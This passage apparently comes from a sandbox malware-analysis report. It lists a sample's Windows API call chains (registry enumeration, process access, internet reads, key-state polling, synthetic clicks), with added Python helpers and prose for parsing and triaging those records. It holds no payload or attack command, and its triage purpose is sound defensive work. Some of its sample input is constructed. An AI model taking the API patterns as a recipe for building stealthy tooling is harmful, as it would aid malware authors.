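    """Return one ApiCall per bullet line; headings and other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def decode_access_mask(mask: int) -> list[str]:
    """Expand a dwDesiredAccess value into PROCESS_* names, low bit first."""
    known = 0
    for bit in PROCESS_ACCESS:
        known |= bit
    names = [name for bit, name in sorted(PROCESS_ACCESS.items()) if mask & bit]
    leftover = mask & ~known
    if leftover:
        names.append(f"UNKNOWN_0x{leftover:X}")
    return names


def open_process_rights(calls: list[ApiCall]) -> dict[int, list[str]]:
    """Map each OpenProcess call site to the decoded rights it requests."""
    out = {}
    for c in calls:
        if c.api == "OpenProcess" and c.args and c.args[0] != "?":
            out[c.ref] = decode_access_mask(int(c.args[0], 16))
    return out


if __name__ == "__main__":
    for ref, rights in open_process_rights(parse_api_lines(SAMPLE_RECORD)).items():
        print(f"OpenProcess @ {ref:08X}: {' | '.join(rights)}")
```

Run on the constructed record, the script resolves the 00000410 mask to PROCESS_VM_READ | PROCESS_QUERY_INFORMATION. The parser keeps unresolved `?` arguments as-is rather than guessing, and reports any access bits outside the documented table as UNKNOWN so that a non-standard mask is not silently dropped.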
APIs
  • Part of subcall function 00DBDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DBCF22,?), ref: 00DBDDFD
  • Part of subcall function 00DBDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DBCF22,?), ref: 00DBDE16
  • Part of subcall function 00DBE199: GetFileAttributesW.KERNEL32(?,00DBCF95), ref: 00DBE19A
• lstrcmpiW.KERNEL32(?,?), ref: 00DBE473
• MoveFileW.KERNEL32(?,?), ref: 00DBE4AC
• _wcslen.LIBCMT ref: 00DBE5EB
• _wcslen.LIBCMT ref: 00DBE603
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00DBE650
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
• Opcode ID: 33a18be13e600b0930b5a8debda8b12c45939c64abff7dd29490be2a48898f76
• Instruction ID: dbfefa96ba78346052540866ffcd4fcf46ec781e1ef1187e2416de45235997a8
• Opcode Fuzzy Hash: 33a18be13e600b0930b5a8debda8b12c45939c64abff7dd29490be2a48898f76
• Instruction Fuzzy Hash: EB515FB24083859BC724EBA4D8919DBB3ECEF84340F44491EF68AD3151EF74E5888776
APIs
  • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
  • Part of subcall function 00DDC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DDB6AE,?,?), ref: 00DDC9B5
  • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDC9F1
  • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA68
  • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DDBAA5
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DDBB00
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DDBB63
• RegCloseKey.ADVAPI32(?,?), ref: 00DDBBA6
• RegCloseKey.ADVAPI32(00000000), ref: 00DDBBB3
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0
• Opcode ID: f5714712120460d05f4561a123f3da6c27749be4e41bc81ab0c9265180b0d6af
• Instruction ID: 21c4fc118121dc091e695c2e7acd55ac7d213989215627de38e5e9140d629696
• Opcode Fuzzy Hash: f5714712120460d05f4561a123f3da6c27749be4e41bc81ab0c9265180b0d6af
• Instruction Fuzzy Hash: A1616D31208241EFD714DF14C490E2ABBE5FF84318F55955EF8998B292DB31ED45CBA2
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(?), ref: 00DB8BCD
                                                                                                            • VariantClear.OLEAUT32 ref: 00DB8C3E
                                                                                                            • VariantClear.OLEAUT32 ref: 00DB8C9D
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DB8D10
                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00DB8D3B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                                                            • String ID:
                                                                                                            • API String ID: 4136290138-0
                                                                                                            • Opcode ID: ee8e631490b1bb29f4b986d176e88ecaa8c1197e296d500400ee865ddea46900
                                                                                                            • Instruction ID: c009b3d3278028af629c8f90fd11c5bb2c2fa37175d5e07f19b3b01eb4de2165
                                                                                                            • Opcode Fuzzy Hash: ee8e631490b1bb29f4b986d176e88ecaa8c1197e296d500400ee865ddea46900
                                                                                                            • Instruction Fuzzy Hash: 37516BB5A00219EFCB10CF58C894AAAB7F8FF89310B15855AE906DB350E730E911CBA0
                                                                                                            APIs
                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00DC8BAE
                                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00DC8BDA
                                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00DC8C32
                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00DC8C57
                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DC8C5F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                            • String ID:
                                                                                                            • API String ID: 2832842796-0
                                                                                                            • Opcode ID: b0ff13816cf83c3e610933c820c516d58719fcec9b2f41b6f9ef67cb33592ecb
                                                                                                            • Instruction ID: f1db2bc78b01d92dbae96d90ab2f8125f7a10397d5a252c3553d2c4e3133c364
                                                                                                            • Opcode Fuzzy Hash: b0ff13816cf83c3e610933c820c516d58719fcec9b2f41b6f9ef67cb33592ecb
                                                                                                            • Instruction Fuzzy Hash: 68512635A00215AFCB05DF64C881E6ABBF5FF49315F088458E849AB362DB31ED55DBA0
                                                                                                            APIs
                                                                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00DD8F40
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00DD8FD0
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DD8FEC
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00DD9032
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00DD9052
                                                                                                              • Part of subcall function 00D6F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00DC1043,?,753CE610), ref: 00D6F6E6
                                                                                                              • Part of subcall function 00D6F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00DAFA64,00000000,00000000,?,?,00DC1043,?,753CE610,?,00DAFA64), ref: 00D6F70D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 666041331-0
                                                                                                            • Opcode ID: eda27845f8f23c1c6d49004e98120824acbbb0bf60b74dc1d41860c8b32f13ac
                                                                                                            • Instruction ID: 7342e94d726fe5133c44cde2cf6e4ddd017f8b7fea3f7a829624bbb8a1c51ebe
                                                                                                            • Opcode Fuzzy Hash: eda27845f8f23c1c6d49004e98120824acbbb0bf60b74dc1d41860c8b32f13ac
                                                                                                            • Instruction Fuzzy Hash: C5511C35604245DFCB15EF68C4948ADBBF1FF49324B088099EC559B362DB31ED86CBA1
                                                                                                            APIs
                                                                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00DE6C33
                                                                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 00DE6C4A
                                                                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00DE6C73
                                                                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00DCAB79,00000000,00000000), ref: 00DE6C98
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00DE6CC7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Long$MessageSendShow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3688381893-0
                                                                                                            • Opcode ID: 778cb02d509d489bb6ebe5cb06559716e90613b025e2dc7e9bbc54fb11282769
                                                                                                            • Instruction ID: 8088a6f6abc6c6cef08c15f68f194ad0cc789ca8dd34d83b5656255161022948
                                                                                                            • Opcode Fuzzy Hash: 778cb02d509d489bb6ebe5cb06559716e90613b025e2dc7e9bbc54fb11282769
                                                                                                            • Instruction Fuzzy Hash: 7C41A235604184AFD724EF2ACC95FA97FA5EB19390F280268F895A72A0C371ED41CA60
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: 173cc2ff3f99e8109e19a3fdf0e6f853adf3038de8f0969399c47b11aca66cbf
                                                                                                            • Instruction ID: 176aa663490af3ee628567f1bb5e7fb92bf838ae81d4fe53be8a91efd2ec055f
                                                                                                            • Opcode Fuzzy Hash: 173cc2ff3f99e8109e19a3fdf0e6f853adf3038de8f0969399c47b11aca66cbf
                                                                                                            • Instruction Fuzzy Hash: 2141D472A00200AFCB24EF79C885A6DB7F5EF89314F254569E515EB396D731ED01CBA0
                                                                                                            APIs
                                                                                                            • GetCursorPos.USER32(?), ref: 00D69141
                                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00D6915E
                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00D69183
                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00D6919D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4210589936-0
                                                                                                            • Opcode ID: 204d090a8b171a3ec34117c01f6280cb931ccde3ba0e893e576b0b9cc9b38993
                                                                                                            • Instruction ID: b8f400ac3022d02d154b31467f3b36dd0dfc3130ce1419f29e6bacc0f1325dab
                                                                                                            • Opcode Fuzzy Hash: 204d090a8b171a3ec34117c01f6280cb931ccde3ba0e893e576b0b9cc9b38993
                                                                                                            • Instruction Fuzzy Hash: FA415F71A0870AEBDF15AF68C854BFEF7B8FB06320F244215E469A6290C7349955CBB1
                                                                                                            APIs
                                                                                                            • GetInputState.USER32 ref: 00DC38CB
                                                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00DC3922
                                                                                                            • TranslateMessage.USER32(?), ref: 00DC394B
                                                                                                            • DispatchMessageW.USER32(?), ref: 00DC3955
                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DC3966
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                            • String ID:
                                                                                                            • API String ID: 2256411358-0
                                                                                                            • Opcode ID: 8a542bc5e0604fa871f7fde3ca8c355d1e332907311eb06eb06c4efc9bbd3c17
                                                                                                            • Instruction ID: 90b930276ba547215a3d9f13e35479e669815400bc02cb3730906adb2bde76d8
                                                                                                            • Opcode Fuzzy Hash: 8a542bc5e0604fa871f7fde3ca8c355d1e332907311eb06eb06c4efc9bbd3c17
                                                                                                            • Instruction Fuzzy Hash: C331B9705043839EEB39CB759848FB637A4EB15304F08856DE452D7190EBB5968ACF31
                                                                                                            APIs
                                                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00DCC21E,00000000), ref: 00DCCF38
                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00DCCF6F
                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,00DCC21E,00000000), ref: 00DCCFB4
                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DCC21E,00000000), ref: 00DCCFC8
                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DCC21E,00000000), ref: 00DCCFF2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 3191363074-0
                                                                                                            • Opcode ID: b3d47c1d93c3421a1c66a8e0dfdcc7acbfc4bbbe829932eeea96098ceb5254ef
                                                                                                            • Instruction ID: 6708d017a1eb6977f6fa271887a2b6986c842211bdbd12678f6473279cba754a
                                                                                                            • Opcode Fuzzy Hash: b3d47c1d93c3421a1c66a8e0dfdcc7acbfc4bbbe829932eeea96098ceb5254ef
                                                                                                            • Instruction Fuzzy Hash: 34316D71915706AFDB20DFA5D884EAABBFAEF04310B14542EF65AD7200D730ED419B70
                                                                                                            APIs
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00DB1915
                                                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 00DB19C1
                                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 00DB19C9
                                                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 00DB19DA
                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00DB19E2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3382505437-0
                                                                                                            • Opcode ID: 298a0485328511eb43110ded3f0ac39e8cc7f76df24df2ace38afa82cc3189da
                                                                                                            • Instruction ID: abe6575c3384d3a698ab875c883c12ce7a12ee5a294cafdc65c402cd9fd00880
                                                                                                            • Opcode Fuzzy Hash: 298a0485328511eb43110ded3f0ac39e8cc7f76df24df2ace38afa82cc3189da
                                                                                                            • Instruction Fuzzy Hash: D931AD75A00259EFCF04CFA8C9A9ADE3BB5EB05315F144229F962EB2D1C7709944CFA0
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00DE5745
                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00DE579D
                                                                                                            • _wcslen.LIBCMT ref: 00DE57AF
                                                                                                            • _wcslen.LIBCMT ref: 00DE57BA
                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DE5816
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 763830540-0
                                                                                                            • Opcode ID: 19fb0eb1f5e8ac53b489da5f0de7d4cb324d83bf842d2e1c9a6d5dcd3b5fd141
                                                                                                            • Instruction ID: 223dd3fe043d1f0d728ad0c7d7cc1daf230e90aef71e6b9c66bc110cd069e19f
                                                                                                            • Opcode Fuzzy Hash: 19fb0eb1f5e8ac53b489da5f0de7d4cb324d83bf842d2e1c9a6d5dcd3b5fd141
                                                                                                            • Instruction Fuzzy Hash: 1B2193319046989ADB20AF61DC84AEE77B8FF05368F148216E959EA1C5D7708985CF70
                                                                                                            APIs
                                                                                                            • IsWindow.USER32(00000000), ref: 00DD0951
                                                                                                            • GetForegroundWindow.USER32 ref: 00DD0968
                                                                                                            • GetDC.USER32(00000000), ref: 00DD09A4
                                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00DD09B0
                                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00DD09E8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 4156661090-0
                                                                                                            • Opcode ID: a9aae18a9f600c37adceebc07455c2ce1dc267889bed83506a173c0e27120a1a
                                                                                                            • Instruction ID: bd6fd9579deb4619924153110677b36c66e5e04f8cf4eecd39b8cd75b99a374c
                                                                                                            • Opcode Fuzzy Hash: a9aae18a9f600c37adceebc07455c2ce1dc267889bed83506a173c0e27120a1a
                                                                                                            • Instruction Fuzzy Hash: C8215035600214AFD704EF69C894A5EBBE9EF84701F04846DE856D7362DA30AC05CB70
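The two records above (the GetWindowRect / PostMessageW 0x0201 / Sleep / PostMessageW 0x0202 chain, and the GetForegroundWindow / GetDC / GetPixel chain) are the kind of per-function API annotations an analyst wants to pull out of a text export of this report and triage automatically rather than by eye: 0x0201 and 0x0202 are WM_LBUTTONDOWN and WM_LBUTTONUP, so the first function posts a synthetic left-click to a window, and the second samples a screen pixel, both consistent with AutoIt runtime helpers. The parser below is an added example and is not Joe Sandbox code; the `SAMPLE` input is constructed from the two records shown above (trimmed to the fields that matter), and the three triage rules in `flag_record` are this editor's own heuristics, not anything the report defines.

```python
"""Parse Joe Sandbox per-function 'APIs' / 'Similarity' text records and flag
API chains worth a second look. Added example, not part of the report."""
import re
from dataclasses import dataclass, field

# Constructed sample input: the two records shown in the report, re-typed in the
# report's own text layout (bullet per API call, ref = call-site address).
SAMPLE = """\
APIs
• GetWindowRect.USER32(?,?), ref: 00DB1915
• PostMessageW.USER32(00000001,00000201,00000001), ref: 00DB19C1
• Sleep.KERNEL32(00000000,?,?,?), ref: 00DB19C9
• PostMessageW.USER32(00000001,00000202,00000000), ref: 00DB19DA
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 00DB19E2
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Instruction Fuzzy Hash: D931AD75A00259EFCF04CFA8C9A9ADE3BB5EB05315F144229F962EB2D1C7709944CFA0
APIs
• IsWindow.USER32(00000000), ref: 00DD0951
• GetForegroundWindow.USER32 ref: 00DD0968
• GetDC.USER32(00000000), ref: 00DD09A4
• GetPixel.GDI32(00000000,?,00000003), ref: 00DD09B0
• ReleaseDC.USER32(00000000,00000003), ref: 00DD09E8
Memory Dump Source
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
"""

# Window-message constants that show up as the second argument of Post/SendMessage.
WM_NAMES = {0x0201: "WM_LBUTTONDOWN", 0x0202: "WM_LBUTTONUP",
            0x0204: "WM_RBUTTONDOWN", 0x0205: "WM_RBUTTONUP"}

# "Api.MODULE(args), ref: ADDR" or "Api.MODULE ref: ADDR" (no argument list).
API_RE = re.compile(r"(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s+ref:\s+([0-9A-Fa-f]{8})")
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")


@dataclass
class Call:
    api: str
    module: str
    args: list          # ints for hex literals, None for '?', else raw token
    ref: str            # call-site address as printed in the report
    subcall: bool = False


@dataclass
class Record:
    calls: list = field(default_factory=list)
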